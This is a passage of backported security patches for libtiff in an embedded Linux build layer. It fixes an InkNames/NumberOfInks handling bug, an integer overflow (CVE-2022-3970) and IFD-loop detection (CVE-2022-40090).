66+countInkNamesString(TIFF *tif, uint32 slen, const char *s)
67 {
68- TIFFDirectory* td = &tif->tif_dir;
69- uint16 i = td->td_samplesperpixel;
70+ uint16 i = 0;
71+ const char *ep = s + slen;
72+ const char *cp = s;
73
74 if (slen > 0) {
75- const char* ep = s+slen;
76- const char* cp = s;
77- for (; i > 0; i--) {
78+ do {
79 for (; cp < ep && *cp != '\0'; cp++) {}
80 if (cp >= ep)
81 goto bad;
82 cp++; /* skip \0 */
83- }
84- return ((uint32)(cp-s));
85+ i++;
86+ } while (cp < ep);
87+ return (i);
88 }
89 bad:
90 TIFFErrorExt(tif->tif_clientdata, "TIFFSetField",
91- "%s: Invalid InkNames value; expecting %d names, found %d",
92- tif->tif_name,
93- td->td_samplesperpixel,
94- td->td_samplesperpixel-i);
95+ "%s: Invalid InkNames value; no NUL at given buffer end location %"PRIu32", after %"PRIu16" ink",
96+ tif->tif_name, slen, i);
97 return (0);
98 }
99
100@@ -476,13 +475,61 @@ _TIFFVSetField(TIFF* tif, uint32 tag, va_list ap)
101 _TIFFsetFloatArray(&td->td_refblackwhite, va_arg(ap, float*), 6);
102 break;
103 case TIFFTAG_INKNAMES:
104- v = (uint16) va_arg(ap, uint16_vap);
105- s = va_arg(ap, char*);
106- v = checkInkNamesString(tif, v, s);
107- status = v > 0;
108- if( v > 0 ) {
109- _TIFFsetNString(&td->td_inknames, s, v);
110- td->td_inknameslen = v;
111+ {
112+ v = (uint16) va_arg(ap, uint16_vap);
113+ s = va_arg(ap, char*);
114+ uint16 ninksinstring;
115+ ninksinstring = countInkNamesString(tif, v, s);
116+ status = ninksinstring > 0;
117+ if(ninksinstring > 0 ) {
118+ _TIFFsetNString(&td->td_inknames, s, v);
119+ td->td_inknameslen = v;
120+ /* Set NumberOfInks to the value ninksinstring */
121+ if (TIFFFieldSet(tif, FIELD_NUMBEROFINKS))
122+ {
123+ if (td->td_numberofinks != ninksinstring) {
124+ TIFFErrorExt(tif->tif_clientdata, module,
125+ "Warning %s; Tag %s:\n Value %"PRIu16" of NumberOfInks is different from the number of inks %"PRIu16".\n -> NumberOfInks value adapted to %"PRIu16"",
126+ tif->tif_name, fip->field_name, td->td_numberofinks, ninksinstring, ninksinstring);
127+ td->td_numberofinks = ninksinstring;
128+ }
129+ } else {
130+ td->td_numberofinks = ninksinstring;
131+ TIFFSetFieldBit(tif, FIELD_NUMBEROFINKS);
132+ }
133+ if (TIFFFieldSet(tif, FIELD_SAMPLESPERPIXEL))
134+ {
135+ if (td->td_numberofinks != td->td_samplesperpixel) {
136+ TIFFErrorExt(tif->tif_clientdata, module,
137+ "Warning %s; Tag %s:\n Value %"PRIu16" of NumberOfInks is different from the SamplesPerPixel value %"PRIu16"",
138+ tif->tif_name, fip->field_name, td->td_numberofinks, td->td_samplesperpixel);
139+ }
140+ }
141+ }
142+ }
143+ break;
144+ case TIFFTAG_NUMBEROFINKS:
145+ v = (uint16)va_arg(ap, uint16_vap);
146+ /* If InkNames already set also NumberOfInks is set accordingly and should be equal */
147+ if (TIFFFieldSet(tif, FIELD_INKNAMES))
148+ {
149+ if (v != td->td_numberofinks) {
150+ TIFFErrorExt(tif->tif_clientdata, module,
151+ "Error %s; Tag %s:\n It is not possible to set the value %"PRIu32" for NumberOfInks\n which is different from the number of inks in the InkNames tag (%"PRIu16")",
152+ tif->tif_name, fip->field_name, v, td->td_numberofinks);
153+ /* Do not set / overwrite number of inks already set by InkNames case accordingly. */
154+ status = 0;
155+ }
156+ } else {
157+ td->td_numberofinks = (uint16)v;
158+ if (TIFFFieldSet(tif, FIELD_SAMPLESPERPIXEL))
159+ {
160+ if (td->td_numberofinks != td->td_samplesperpixel) {
161+ TIFFErrorExt(tif->tif_clientdata, module,
162+ "Warning %s; Tag %s:\n Value %"PRIu32" of NumberOfInks is different from the SamplesPerPixel value %"PRIu16"",
163+ tif->tif_name, fip->field_name, v, td->td_samplesperpixel);
164+ }
165+ }
166 }
167 break;
168 case TIFFTAG_PERSAMPLE:
169@@ -887,34 +934,6 @@ _TIFFVGetField(TIFF* tif, uint32 tag, va_list ap)
170 if (fip->field_bit == FIELD_CUSTOM) {
171 standard_tag = 0;
172 }
173-
174- if( standard_tag == TIFFTAG_NUMBEROFINKS )
175- {
176- int i;
177- for (i = 0; i < td->td_customValueCount; i++) {
178- uint16 val;
179- TIFFTagValue *tv = td->td_customValues + i;
180- if (tv->info->field_tag != standard_tag)
181- continue;
182- if( tv->value == NULL )
183- return 0;
184- val = *(uint16 *)tv->value;
185- /* Truncate to SamplesPerPixel, since the */
186- /* setting code for INKNAMES assume that there are SamplesPerPixel */
187- /* inknames. */
188- /* Fixes http://bugzilla.maptools.org/show_bug.cgi?id=2599 */
189- if( val > td->td_samplesperpixel )
190- {
191- TIFFWarningExt(tif->tif_clientdata,"_TIFFVGetField",
192- "Truncating NumberOfInks from %u to %u",
193- val, td->td_samplesperpixel);
194- val = td->td_samplesperpixel;
195- }
196- *va_arg(ap, uint16*) = val;
197- return 1;
198- }
199- return 0;
200- }
201
202 switch (standard_tag) {
203 case TIFFTAG_SUBFILETYPE:
204@@ -1092,6 +1111,9 @@ _TIFFVGetField(TIFF* tif, uint32 tag, va_list ap)
205 case TIFFTAG_INKNAMES:
206 *va_arg(ap, char**) = td->td_inknames;
207 break;
208+ case TIFFTAG_NUMBEROFINKS:
209+ *va_arg(ap, uint16 *) = td->td_numberofinks;
210+ break;
211 default:
212 {
213 int i;
214diff --git a/libtiff/tif_dir.h b/libtiff/tif_dir.h
215index e7f0667..7cad679 100644
216--- a/libtiff/tif_dir.h
217+++ b/libtiff/tif_dir.h
218@@ -117,6 +117,7 @@ typedef struct {
219 /* CMYK parameters */
220 int td_inknameslen;
221 char* td_inknames;
222+ uint16 td_numberofinks; /* number of inks in InkNames string */
223
224 int td_customValueCount;
225 TIFFTagValue *td_customValues;
226@@ -174,6 +175,7 @@ typedef struct {
227 #define FIELD_TRANSFERFUNCTION 44
228 #define FIELD_INKNAMES 46
229 #define FIELD_SUBIFD 49
230+#define FIELD_NUMBEROFINKS 50
231 /* FIELD_CUSTOM (see tiffio.h) 65 */
232 /* end of support for well-known tags; codec-private tags follow */
233 #define FIELD_CODEC 66 /* base of codec-private tags */
234diff --git a/libtiff/tif_dirinfo.c b/libtiff/tif_dirinfo.c
235index fbfaaf0..bf7de70 100644
236--- a/libtiff/tif_dirinfo.c
237+++ b/libtiff/tif_dirinfo.c
238@@ -104,7 +104,7 @@ tiffFields[] = {
239 { TIFFTAG_SUBIFD, -1, -1, TIFF_IFD8, 0, TIFF_SETGET_C16_IFD8, TIFF_SETGET_UNDEFINED, FIELD_SUBIFD, 1, 1, "SubIFD", (TIFFFieldArray*) &tiffFieldArray },
240 { TIFFTAG_INKSET, 1, 1, TIFF_SHORT, 0, TIFF_SETGET_UINT16, TIFF_SETGET_UNDEFINED, FIELD_CUSTOM, 0, 0, "InkSet", NULL },
241 { TIFFTAG_INKNAMES, -1, -1, TIFF_ASCII, 0, TIFF_SETGET_C16_ASCII, TIFF_SETGET_UNDEFINED, FIELD_INKNAMES, 1, 1, "InkNames", NULL },
242- { TIFFTAG_NUMBEROFINKS, 1, 1, TIFF_SHORT, 0, TIFF_SETGET_UINT16, TIFF_SETGET_UNDEFINED, FIELD_CUSTOM, 1, 0, "NumberOfInks", NULL },
243+ { TIFFTAG_NUMBEROFINKS, 1, 1, TIFF_SHORT, 0, TIFF_SETGET_UINT16, TIFF_SETGET_UNDEFINED, FIELD_NUMBEROFINKS, 1, 0, "NumberOfInks", NULL },
244 { TIFFTAG_DOTRANGE, 2, 2, TIFF_SHORT, 0, TIFF_SETGET_UINT16_PAIR, TIFF_SETGET_UNDEFINED, FIELD_CUSTOM, 0, 0, "DotRange", NULL },
245 { TIFFTAG_TARGETPRINTER, -1, -1, TIFF_ASCII, 0, TIFF_SETGET_ASCII, TIFF_SETGET_UNDEFINED, FIELD_CUSTOM, 1, 0, "TargetPrinter", NULL },
246 { TIFFTAG_EXTRASAMPLES, -1, -1, TIFF_SHORT, 0, TIFF_SETGET_C16_UINT16, TIFF_SETGET_UNDEFINED, FIELD_EXTRASAMPLES, 0, 1, "ExtraSamples", NULL },
247diff --git a/libtiff/tif_dirwrite.c b/libtiff/tif_dirwrite.c
248index 9e4d306..a2dbc3b 100644
249--- a/libtiff/tif_dirwrite.c
250+++ b/libtiff/tif_dirwrite.c
251@@ -677,6 +677,11 @@ TIFFWriteDirectorySec(TIFF* tif, int isimage, int imagedone, uint64* pdiroff)
252 if (!TIFFWriteDirectoryTagAscii(tif,&ndir,dir,TIFFTAG_INKNAMES,tif->tif_dir.td_inknameslen,tif->tif_dir.td_inknames))
253 goto bad;
254 }
255+ if (TIFFFieldSet(tif, FIELD_NUMBEROFINKS))
256+ {
257+ if (!TIFFWriteDirectoryTagShort(tif, &ndir, dir, TIFFTAG_NUMBEROFINKS, tif->tif_dir.td_numberofinks))
258+ goto bad;
259+ }
260 if (TIFFFieldSet(tif,FIELD_SUBIFD))
261 {
262 if (!TIFFWriteDirectoryTagSubifd(tif,&ndir,dir))
263diff --git a/libtiff/tif_print.c b/libtiff/tif_print.c
264index a073794..a9f05a7 100644
265--- a/libtiff/tif_print.c
266+++ b/libtiff/tif_print.c
267@@ -402,6 +402,10 @@ TIFFPrintDirectory(TIFF* tif, FILE* fd, long flags)
268 }
269 fputs("\n", fd);
270 }
271+ if (TIFFFieldSet(tif, FIELD_NUMBEROFINKS)) {
272+ fprintf(fd, " NumberOfInks: %d\n",
273+ td->td_numberofinks);
274+ }
275 if (TIFFFieldSet(tif,FIELD_THRESHHOLDING)) {
276 fprintf(fd, " Thresholding: ");
277 switch (td->td_threshholding) {
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-3970.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-3970.patch
new file mode 100644
index 0000000000..ea70827cbe
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-3970.patch
@@ -0,0 +1,45 @@
1From 7e87352217d1f0c77eee7033ac59e3aab08532bb Mon Sep 17 00:00:00 2001
2From: Even Rouault <even.rouault@spatialys.com>
3Date: Tue, 8 Nov 2022 15:16:58 +0100
4Subject: [PATCH] TIFFReadRGBATileExt(): fix (unsigned) integer overflow on
5
6Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
7CVE: CVE-2022-3970
8Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
9
10Origin: https://gitlab.com/libtiff/libtiff/-/commit/227500897dfb07fb7d27f7aa570050e62617e3be
11Reviewed-by: Sylvain Beucler <beuc@debian.org>
12Last-Update: 2023-01-17
13
14 strips/tiles > 2 GB
15
16Fixes https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=53137
17
18---
19 libtiff/tif_getimage.c | 8 ++++----
20 1 file changed, 4 insertions(+), 4 deletions(-)
21
22diff --git a/libtiff/tif_getimage.c b/libtiff/tif_getimage.c
23index 96ab146..0b90dcc 100644
24--- a/libtiff/tif_getimage.c
25+++ b/libtiff/tif_getimage.c
26@@ -3042,15 +3042,15 @@ TIFFReadRGBATileExt(TIFF* tif, uint32 col, uint32 row, uint32 * raster, int stop
27 return( ok );
28
29 for( i_row = 0; i_row < read_ysize; i_row++ ) {
30- memmove( raster + (tile_ysize - i_row - 1) * tile_xsize,
31- raster + (read_ysize - i_row - 1) * read_xsize,
32+ memmove( raster + (size_t)(tile_ysize - i_row - 1) * tile_xsize,
33+ raster + (size_t)(read_ysize - i_row - 1) * read_xsize,
34 read_xsize * sizeof(uint32) );
35- _TIFFmemset( raster + (tile_ysize - i_row - 1) * tile_xsize+read_xsize,
36+ _TIFFmemset( raster + (size_t)(tile_ysize - i_row - 1) * tile_xsize+read_xsize,
37 0, sizeof(uint32) * (tile_xsize - read_xsize) );
38 }
39
40 for( i_row = read_ysize; i_row < tile_ysize; i_row++ ) {
41- _TIFFmemset( raster + (tile_ysize - i_row - 1) * tile_xsize,
42+ _TIFFmemset( raster + (size_t)(tile_ysize - i_row - 1) * tile_xsize,
43 0, sizeof(uint32) * tile_xsize );
44 }
45
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-40090.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-40090.patch
new file mode 100644
index 0000000000..0a88f59553
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-40090.patch
@@ -0,0 +1,548 @@
1From d385738335deb0c4bb70449f12e411f2203c0d01 Mon Sep 17 00:00:00 2001
2From: Su_Laus <sulau@freenet.de>
3Date: Fri, 2 Sep 2022 21:20:28 +0200
4Subject: [PATCH 1/4] Improved IFD-Loop Handling (fixes #455)
5
6Basic approach:
7- The order in the entire chain must be checked, and not only whether an offset has already been read once.
8- To do this, pairs of directory number and offset are stored and checked.
9- The offset of a directory number can change.
10- TIFFAdvanceDirectory() must also perform an IFD loop check.
11- TIFFCheckDirOffset() is replaced by _TIFFCheckDirNumberAndOffset().
12
13Rules for the check:
14- If an offset is already in the list, it must have the same IFD number. Otherwise it is an IDF loop.
15- If the offset is not in the list and the IFD number is greater than there are list entries, a new list entry is added.
16- Otherwise, the offset of the IFD number is updated.
17
18Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2022-40090.patch?h=ubuntu/focal-security
19Upstream commit
20https://gitlab.com/libtiff/libtiff/-/commit/c7caec9a4d8f24c17e667480d2c7d0d51c9fae41]
21CVE: CVE-2022-40090
22Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
23---
24 libtiff/tif_close.c | 6 ++-
25 libtiff/tif_dir.c | 91 +++++++++++++++++++++++++----------------
26 libtiff/tif_dir.h | 1 +
27 libtiff/tif_dirread.c | 94 ++++++++++++++++++++++++++++++-------------
28 libtiff/tif_open.c | 3 +-
29 libtiff/tiffiop.h | 3 +-
30 6 files changed, 131 insertions(+), 67 deletions(-)
31
32--- tiff-4.1.0+git191117.orig/libtiff/tif_close.c
33+++ tiff-4.1.0+git191117/libtiff/tif_close.c
34@@ -52,8 +52,10 @@ TIFFCleanup(TIFF* tif)
35 (*tif->tif_cleanup)(tif);
36 TIFFFreeDirectory(tif);
37
38- if (tif->tif_dirlist)
39- _TIFFfree(tif->tif_dirlist);
40+ if (tif->tif_dirlistoff)
41+ _TIFFfree(tif->tif_dirlistoff);
42+ if (tif->tif_dirlistdirn)
43+ _TIFFfree(tif->tif_dirlistdirn);
44
45 /*
46 * Clean up client info links.
47--- tiff-4.1.0+git191117.orig/libtiff/tif_dir.c
48+++ tiff-4.1.0+git191117/libtiff/tif_dir.c
49@@ -1463,12 +1463,22 @@ TIFFDefaultDirectory(TIFF* tif)
50 }
51
52 static int
53-TIFFAdvanceDirectory(TIFF* tif, uint64* nextdir, uint64* off)
54+TIFFAdvanceDirectory(TIFF* tif, uint64* nextdiroff, uint64* off, uint16* nextdirnum)
55 {
56 static const char module[] = "TIFFAdvanceDirectory";
57+
58+ /* Add this directory to the directory list, if not already in. */
59+ if (!_TIFFCheckDirNumberAndOffset(tif, *nextdirnum, *nextdiroff)) {
60+ TIFFErrorExt(tif->tif_clientdata, module, "Starting directory %hu at offset 0x%lx (%lu) might cause an IFD loop",
61+ *nextdirnum, *nextdiroff, *nextdiroff);
62+ *nextdiroff = 0;
63+ *nextdirnum = 0;
64+ return(0);
65+ }
66+
67 if (isMapped(tif))
68 {
69- uint64 poff=*nextdir;
70+ uint64 poff=*nextdiroff;
71 if (!(tif->tif_flags&TIFF_BIGTIFF))
72 {
73 tmsize_t poffa,poffb,poffc,poffd;
74@@ -1479,7 +1489,7 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
75 if (((uint64)poffa!=poff)||(poffb<poffa)||(poffb<(tmsize_t)sizeof(uint16))||(poffb>tif->tif_size))
76 {
77 TIFFErrorExt(tif->tif_clientdata,module,"Error fetching directory count");
78- *nextdir=0;
79+ *nextdiroff=0;
80 return(0);
81 }
82 _TIFFmemcpy(&dircount,tif->tif_base+poffa,sizeof(uint16));
83@@ -1497,7 +1507,7 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
84 _TIFFmemcpy(&nextdir32,tif->tif_base+poffc,sizeof(uint32));
85 if (tif->tif_flags&TIFF_SWAB)
86 TIFFSwabLong(&nextdir32);
87- *nextdir=nextdir32;
88+ *nextdiroff=nextdir32;
89 }
90 else
91 {
92@@ -1529,11 +1539,10 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
93 }
94 if (off!=NULL)
95 *off=(uint64)poffc;
96- _TIFFmemcpy(nextdir,tif->tif_base+poffc,sizeof(uint64));
97+ _TIFFmemcpy(nextdiroff,tif->tif_base+poffc,sizeof(uint64));
98 if (tif->tif_flags&TIFF_SWAB)
99- TIFFSwabLong8(nextdir);
100+ TIFFSwabLong8(nextdiroff);
101 }
102- return(1);
103 }
104 else
105 {
106@@ -1541,7 +1550,7 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
107 {
108 uint16 dircount;
109 uint32 nextdir32;
110- if (!SeekOK(tif, *nextdir) ||
111+ if (!SeekOK(tif, *nextdiroff) ||
112 !ReadOK(tif, &dircount, sizeof (uint16))) {
113 TIFFErrorExt(tif->tif_clientdata, module, "%s: Error fetching directory count",
114 tif->tif_name);
115@@ -1562,13 +1571,13 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
116 }
117 if (tif->tif_flags & TIFF_SWAB)
118 TIFFSwabLong(&nextdir32);
119- *nextdir=nextdir32;
120+ *nextdiroff=nextdir32;
121 }
122 else
123 {
124 uint64 dircount64;
125 uint16 dircount16;
126- if (!SeekOK(tif, *nextdir) ||
127+ if (!SeekOK(tif, *nextdiroff) ||
128 !ReadOK(tif, &dircount64, sizeof (uint64))) {
129 TIFFErrorExt(tif->tif_clientdata, module, "%s: Error fetching directory count",
130 tif->tif_name);
131@@ -1588,17 +1597,27 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
132 else
133 (void) TIFFSeekFile(tif,
134 dircount16*20, SEEK_CUR);
135- if (!ReadOK(tif, nextdir, sizeof (uint64))) {
136+ if (!ReadOK(tif, nextdiroff, sizeof (uint64))) {
137 TIFFErrorExt(tif->tif_clientdata, module,
138 "%s: Error fetching directory link",
139 tif->tif_name);
140 return (0);
141 }
142 if (tif->tif_flags & TIFF_SWAB)
143- TIFFSwabLong8(nextdir);
144+ TIFFSwabLong8(nextdiroff);
145 }
146- return (1);
147 }
148+ if (*nextdiroff != 0) {
149+ (*nextdirnum)++;
150+ /* Check next directory for IFD looping and if so, set it as last directory. */
151+ if (!_TIFFCheckDirNumberAndOffset(tif, *nextdirnum, *nextdiroff)) {
152+ TIFFWarningExt(tif->tif_clientdata, module, "the next directory %hu at offset 0x%lx (%lu) might be an IFD loop. Treating directory %hu as last directory",
153+ *nextdirnum, *nextdiroff, *nextdiroff, *nextdirnum-1);
154+ *nextdiroff = 0;
155+ (*nextdirnum)--;
156+ }
157+ }
158+ return (1);
159 }
160
161 /*
162@@ -1608,14 +1627,16 @@ uint16
163 TIFFNumberOfDirectories(TIFF* tif)
164 {
165 static const char module[] = "TIFFNumberOfDirectories";
166- uint64 nextdir;
167+ uint64 nextdiroff;
168+ uint16 nextdirnum;
169 uint16 n;
170 if (!(tif->tif_flags&TIFF_BIGTIFF))
171- nextdir = tif->tif_header.classic.tiff_diroff;
172+ nextdiroff = tif->tif_header.classic.tiff_diroff;
173 else
174- nextdir = tif->tif_header.big.tiff_diroff;
175+ nextdiroff = tif->tif_header.big.tiff_diroff;
176+ nextdirnum = 0;
177 n = 0;
178- while (nextdir != 0 && TIFFAdvanceDirectory(tif, &nextdir, NULL))
179+ while (nextdiroff != 0 && TIFFAdvanceDirectory(tif, &nextdiroff, NULL, &nextdirnum))
180 {
181 if (n != 65535) {
182 ++n;
183@@ -1638,28 +1659,30 @@ TIFFNumberOfDirectories(TIFF* tif)
184 int
185 TIFFSetDirectory(TIFF* tif, uint16 dirn)
186 {
187- uint64 nextdir;
188+ uint64 nextdiroff;
189+ uint16 nextdirnum;
190 uint16 n;
191
192 if (!(tif->tif_flags&TIFF_BIGTIFF))
193- nextdir = tif->tif_header.classic.tiff_diroff;
194+ nextdiroff = tif->tif_header.classic.tiff_diroff;
195 else
196- nextdir = tif->tif_header.big.tiff_diroff;
197- for (n = dirn; n > 0 && nextdir != 0; n--)
198- if (!TIFFAdvanceDirectory(tif, &nextdir, NULL))
199+ nextdiroff = tif->tif_header.big.tiff_diroff;
200+ nextdirnum = 0;
201+ for (n = dirn; n > 0 && nextdiroff != 0; n--)
202+ if (!TIFFAdvanceDirectory(tif, &nextdiroff, NULL, &nextdirnum))
203 return (0);
204- tif->tif_nextdiroff = nextdir;
205+ /* If the n-th directory could not be reached (does not exist),
206+ * return here without touching anything further. */
207+ if (nextdiroff == 0 || n > 0)
208+ return (0);
209+
210+ tif->tif_nextdiroff = nextdiroff;
211 /*
212 * Set curdir to the actual directory index. The
213 * -1 is because TIFFReadDirectory will increment
214 * tif_curdir after successfully reading the directory.
215 */
216 tif->tif_curdir = (dirn - n) - 1;
217- /*
218- * Reset tif_dirnumber counter and start new list of seen directories.
219- * We need this to prevent IFD loops.
220- */
221- tif->tif_dirnumber = 0;
222 return (TIFFReadDirectory(tif));
223 }
224
225@@ -1672,13 +1695,42 @@ TIFFSetDirectory(TIFF* tif, uint16 dirn)
226 int
227 TIFFSetSubDirectory(TIFF* tif, uint64 diroff)
228 {
229- tif->tif_nextdiroff = diroff;
230- /*
231- * Reset tif_dirnumber counter and start new list of seen directories.
232- * We need this to prevent IFD loops.
233+ /* Match nextdiroff and curdir for consistent IFD-loop checking.
234+ * Only with TIFFSetSubDirectory() the IFD list can be corrupted with invalid offsets
235+ * within the main IFD tree.
236+ * In the case of several subIFDs of a main image,
237+ * there are two possibilities that are not even mutually exclusive.
238+ * a.) The subIFD tag contains an array with all offsets of the subIFDs.
239+ * b.) The SubIFDs are concatenated with their NextIFD parameters.
240+ * (refer to https://www.awaresystems.be/imaging/tiff/specification/TIFFPM6.pdf.)
241 */
242- tif->tif_dirnumber = 0;
243- return (TIFFReadDirectory(tif));
244+ int retval;
245+ uint16 curdir = 0;
246+ int8 probablySubIFD = 0;
247+ if (diroff == 0) {
248+ /* Special case to invalidate the tif_lastdiroff member. */
249+ tif->tif_curdir = 65535;
250+ } else {
251+ if (!_TIFFGetDirNumberFromOffset(tif, diroff, &curdir)) {
252+ /* Non-existing offsets might point to a SubIFD or invalid IFD.*/
253+ probablySubIFD = 1;
254+ }
255+ /* -1 because TIFFReadDirectory() will increment tif_curdir. */
256+ tif->tif_curdir = curdir - 1;
257+ }
258+
259+ tif->tif_nextdiroff = diroff;
260+ retval = TIFFReadDirectory(tif);
261+ /* If failed, curdir was not incremented in TIFFReadDirectory(), so set it back. */
262+ if (!retval )tif->tif_curdir++;
263+ if (retval && probablySubIFD) {
264+ /* Reset IFD list to start new one for SubIFD chain and also start SubIFD chain with tif_curdir=0. */
265+ tif->tif_dirnumber = 0;
266+ tif->tif_curdir = 0; /* first directory of new chain */
267+ /* add this offset to new IFD list */
268+ _TIFFCheckDirNumberAndOffset(tif, tif->tif_curdir, diroff);
269+ }
270+ return (retval);
271 }
272
273 /*
274@@ -1702,12 +1754,15 @@ TIFFLastDirectory(TIFF* tif)
275
276 /*
277 * Unlink the specified directory from the directory chain.
278+ * Note: First directory starts with number dirn=1.
279+ * This is different to TIFFSetDirectory() where the first directory starts with zero.
280 */
281 int
282 TIFFUnlinkDirectory(TIFF* tif, uint16 dirn)
283 {
284 static const char module[] = "TIFFUnlinkDirectory";
285 uint64 nextdir;
286+ uint16 nextdirnum;
287 uint64 off;
288 uint16 n;
289
290@@ -1731,19 +1786,21 @@ TIFFUnlinkDirectory(TIFF* tif, uint16 di
291 nextdir = tif->tif_header.big.tiff_diroff;
292 off = 8;
293 }
294+ nextdirnum = 0; /* First directory is dirn=0 */
295+
296 for (n = dirn-1; n > 0; n--) {
297 if (nextdir == 0) {
298 TIFFErrorExt(tif->tif_clientdata, module, "Directory %d does not exist", dirn);
299 return (0);
300 }
301- if (!TIFFAdvanceDirectory(tif, &nextdir, &off))
302+ if (!TIFFAdvanceDirectory(tif, &nextdir, &off, &nextdirnum))
303 return (0);
304 }
305 /*
306 * Advance to the directory to be unlinked and fetch
307 * the offset of the directory that follows.
308 */
309- if (!TIFFAdvanceDirectory(tif, &nextdir, NULL))
310+ if (!TIFFAdvanceDirectory(tif, &nextdir, NULL, &nextdirnum))
311 return (0);
312 /*
313 * Go back and patch the link field of the preceding
314--- tiff-4.1.0+git191117.orig/libtiff/tif_dir.h
315+++ tiff-4.1.0+git191117/libtiff/tif_dir.h
316@@ -300,6 +300,8 @@ extern int _TIFFMergeFields(TIFF*, const
317 extern const TIFFField* _TIFFFindOrRegisterField(TIFF *, uint32, TIFFDataType);
318 extern TIFFField* _TIFFCreateAnonField(TIFF *, uint32, TIFFDataType);
319 extern int _TIFFCheckFieldIsValidForCodec(TIFF *tif, ttag_t tag);
320+extern int _TIFFCheckDirNumberAndOffset(TIFF *tif, uint16 dirn, uint64 diroff);
321+extern int _TIFFGetDirNumberFromOffset(TIFF *tif, uint64 diroff, uint16 *dirn);
322
323 #if defined(__cplusplus)
324 }
325--- tiff-4.1.0+git191117.orig/libtiff/tif_dirread.c
326+++ tiff-4.1.0+git191117/libtiff/tif_dirread.c
327@@ -158,7 +158,6 @@ static void TIFFReadDirectoryFindFieldIn
328
329 static int EstimateStripByteCounts(TIFF* tif, TIFFDirEntry* dir, uint16 dircount);
330 static void MissingRequired(TIFF*, const char*);
331-static int TIFFCheckDirOffset(TIFF* tif, uint64 diroff);
332 static int CheckDirCount(TIFF*, TIFFDirEntry*, uint32);
333 static uint16 TIFFFetchDirectory(TIFF* tif, uint64 diroff, TIFFDirEntry** pdir, uint64* nextdiroff);
334 static int TIFFFetchNormalTag(TIFF*, TIFFDirEntry*, int recover);
335@@ -3584,12 +3583,19 @@ TIFFReadDirectory(TIFF* tif)
336 int bitspersample_read = FALSE;
337 int color_channels;
338
339- tif->tif_diroff=tif->tif_nextdiroff;
340- if (!TIFFCheckDirOffset(tif,tif->tif_nextdiroff))
341- return 0; /* last offset or bad offset (IFD looping) */
342- (*tif->tif_cleanup)(tif); /* cleanup any previous compression state */
343- tif->tif_curdir++;
344- nextdiroff = tif->tif_nextdiroff;
345+ if (tif->tif_nextdiroff == 0) {
346+ /* In this special case, tif_diroff needs also to be set to 0. */
347+ tif->tif_diroff = tif->tif_nextdiroff;
348+ return 0; /* last offset, thus no checking necessary */
349+ }
350+
351+ nextdiroff = tif->tif_nextdiroff;
352+ /* tif_curdir++ and tif_nextdiroff should only be updated after SUCCESSFUL reading of the directory. Otherwise, invalid IFD offsets could corrupt the IFD list. */
353+ if (!_TIFFCheckDirNumberAndOffset(tif, tif->tif_curdir + 1, nextdiroff)) {
354+ TIFFWarningExt(tif->tif_clientdata, module,
355+ "Didn't read next directory due to IFD looping at offset 0x%lx (%lu) to offset 0x%lx (%lu)", tif->tif_diroff, tif->tif_diroff, nextdiroff, nextdiroff);
356+ return 0; /* bad offset (IFD looping) */
357+ }
358 dircount=TIFFFetchDirectory(tif,nextdiroff,&dir,&tif->tif_nextdiroff);
359 if (!dircount)
360 {
361@@ -3597,6 +3603,11 @@ TIFFReadDirectory(TIFF* tif)
362 "Failed to read directory at offset " TIFF_UINT64_FORMAT,nextdiroff);
363 return 0;
364 }
365+ /* Set global values after a valid directory has been fetched.
366+ * tif_diroff is already set to nextdiroff in TIFFFetchDirectory() in the beginning. */
367+ tif->tif_curdir++;
368+ (*tif->tif_cleanup)(tif); /* cleanup any previous compression state */
369+
370 TIFFReadDirectoryCheckOrder(tif,dir,dircount);
371
372 /*
373@@ -4628,13 +4639,17 @@ MissingRequired(TIFF* tif, const char* t
374 }
375
376 /*
377- * Check the directory offset against the list of already seen directory
378- * offsets. This is a trick to prevent IFD looping. The one can create TIFF
379- * file with looped directory pointers. We will maintain a list of already
380- * seen directories and check every IFD offset against that list.
381+ * Check the directory number and offset against the list of already seen
382+ * directory numbers and offsets. This is a trick to prevent IFD looping.
383+ * The one can create TIFF file with looped directory pointers. We will
384+ * maintain a list of already seen directories and check every IFD offset
385+ * and its IFD number against that list. However, the offset of an IFD number
386+ * can change - e.g. when writing updates to file.
387+ * Returns 1 if all is ok; 0 if last directory or IFD loop is encountered,
388+ * or an error has occured.
389 */
390-static int
391-TIFFCheckDirOffset(TIFF* tif, uint64 diroff)
392+int
393+_TIFFCheckDirNumberAndOffset(TIFF* tif, uint16 dirn, uint64 diroff)
394 {
395 uint16 n;
396
397@@ -4646,35 +4661,64 @@ TIFFCheckDirOffset(TIFF* tif, uint64 dir
398 return 0;
399 }
400
401- for (n = 0; n < tif->tif_dirnumber && tif->tif_dirlist; n++) {
402- if (tif->tif_dirlist[n] == diroff)
403- return 0;
404+ /* Check if offset is already in the list:
405+ * - yes: check, if offset is at the same IFD number - if not, it is an IFD loop
406+ * - no: add to list or update offset at that IFD number
407+ */
408+ for (n = 0; n < tif->tif_dirnumber && tif->tif_dirlistdirn && tif->tif_dirlistoff; n++) {
409+ if (tif->tif_dirlistoff[n] == diroff) {
410+ if (tif->tif_dirlistdirn[n] == dirn) {
411+ return 1;
412+ } else {
413+ TIFFWarningExt(tif->tif_clientdata, "_TIFFCheckDirNumberAndOffset",
414+ "TIFF directory %hu has IFD looping to directory %hu at offset 0x%lx (%lu)",
415+ dirn-1, tif->tif_dirlistdirn[n], diroff, diroff);
416+ return 0;
417+ }
418+ }
419+ }
